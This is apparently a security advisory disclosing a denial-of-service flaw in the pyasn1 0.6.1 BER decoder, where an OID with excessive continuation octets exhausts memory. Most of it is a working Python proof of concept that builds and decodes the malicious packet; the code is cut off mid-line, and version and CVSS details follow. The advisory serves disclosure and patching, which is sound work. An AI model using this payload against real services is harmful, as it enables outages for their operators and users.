After reviewing pyasn1 v0.6.1 a Denial-of-Service issue has been found that leads to memory exhaustion from malformed RELATIVE-OID with excessive continuation octets.
The integer issue can be found in the decoder as reloid += ((subId << 7) + nextSubId,): https://github.com/pyasn1/pyasn1/blob/main/pyasn1/codec/ber/decoder.py#L496
For the DoS:
import pyasn1.codec.ber.decoder as decoder
import pyasn1.type.univ as univ
import sys
import resource
# Deliberately set memory limit to display PoC
try:
resource.setrlimit(resource.RLIMIT_AS, (100*1024*1024, 100*1024*1024))
print("[*] Memory limit set to 100MB")
except:
print("[-] Could not set memory limit")
# Test with different payload sizes to find the DoS threshold
payload_size_mb = int(sys.argv[1])
print(f"[*] Testing with {payload_size_mb}MB payload...")
payload_size = payload_size_mb * 1024 * 1024
# Create payload with continuation octets
# Each 0x81 byte indicates continuation, causing bit shifting in decoder
payload = b'\x81' * payload_size + b'\x00'
length = len(payload)
# DER length encoding (supports up to 4GB)
if length < 128:
length_bytes = bytes([length])
elif length < 256:
length_bytes = b'\x81' + length.to_bytes(1, 'big')
elif length < 256**2:
length_bytes = b'\x82' + length.to_bytes(2, 'big')
elif length < 256**3:
length_bytes = b'\x83' + length.to_bytes(3, 'big')
else:
# 4 bytes can handle up to 4GB
length_bytes = b'\x84' + length.to_bytes(4, 'big')
# Use OID (0x06) for more aggressive parsing
malicious_packet = b'\x06' + length_bytes + payload
print(f"[*] Packet size: {len(malicious_packet) / 1024 / 1024:.1f} MB")
try:
print("[*] Decoding (this may take time or exhaust memory)...")
result = decoder.decode(malicious_packet, asn1Spec=univ.ObjectIdentifier())
print(f'[+] Decoded successfully')
print(f'[!] Object size: {sys.getsizeof(result[0])} bytes')
# Try to convert to string
print('[*]...
0.6.10.6.2Exploitability
AV:NAC:LPR:NUI:NScope
S:UImpact
C:NI:NA:H7.5/CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H